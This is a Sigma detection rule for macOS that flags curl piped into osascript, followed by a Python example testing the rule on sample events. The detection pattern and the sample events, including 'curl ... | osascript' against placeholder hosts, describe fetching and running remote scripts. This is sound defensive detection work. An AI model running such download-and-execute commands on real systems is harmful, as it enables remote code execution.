In-memory Downloading and Compiling of Applets as Payloads

This analytic uses a single ES_EVENT_TYPE_NOTIFY_EXEC event and looks for the execution of curl, |, or osacompile commands. Part of the RedCanary 2024 Threat Detection Report.

Sigma rule

```yaml
title: In-memory Downloading and Compiling of Applets as Payloads
id: 75933b00-4949-4cf0-a0e0-f234c3ff1407
status: experimental
description: |
    This analytic uses a single ES_EVENT_TYPE_NOTIFY_EXEC event and looks for
    the execution of curl, |, or osacompile commands. Part of the RedCanary
    2024 Threat Detection Report.
references:
    - https://redcanary.com/threat-detection-report/techniques/applescript/
author: RedCanary, Sigma formatting by Micah Babinski
date: 2024/03/21
tags:
    - attack.execution
    - attack.t1059
    - attack.t1059.002
logsource:
    product: macos
    category: process_creation
detection:
    selection:
        CommandLine|contains|all:
            - 'osascript'
            - '|'
            - 'curl'
    condition: selection
falsepositives:
    - Unknown
level: low
```
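The `CommandLine|contains|all` selection above, evaluated over constructed process_creation events, as an added example (not the rule author's or the Sigma project's code). It assumes Sigma's default case-insensitive `contains` semantics and events that carry a `CommandLine` field.

```python
"""Evaluate the rule's `contains|all` selection against sample macOS
process_creation events. Added example, not part of the original rule."""

# Terms copied from the rule's `CommandLine|contains|all` list.
RULE_TERMS = ("osascript", "|", "curl")


def command_line_matches(command_line: str, terms=RULE_TERMS) -> bool:
    """Sigma `contains` is case-insensitive; `all` requires every term."""
    haystack = command_line.lower()
    return all(term.lower() in haystack for term in terms)


def evaluate(events):
    """Return the ids of events whose CommandLine satisfies the selection."""
    return [e["id"] for e in events if command_line_matches(e["CommandLine"])]


# Constructed sample events (not real telemetry); hosts are placeholders.
SAMPLE_EVENTS = [
    # All three terms present: matches.
    {"id": 1, "CommandLine": "/bin/sh -c curl -s https://example.invalid/a.scpt | osascript"},
    # osascript alone, no curl and no pipe: no match.
    {"id": 2, "CommandLine": "osascript -e 'display dialog \"hi\"'"},
    # curl alone: no match (this is why the rule needs `all`).
    {"id": 3, "CommandLine": "curl -O https://example.invalid/file.txt"},
    # Mixed case still matches because `contains` ignores case.
    {"id": 4, "CommandLine": "CURL https://example.invalid/x | OSASCRIPT -"},
]

if __name__ == "__main__":
    print(evaluate(SAMPLE_EVENTS))  # [1, 4]
```

Because the pipe term is a single character, anything with a `|` plus the two binary names anywhere in the command line matches, which is consistent with the rule's `low` level and `Unknown` false positives.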
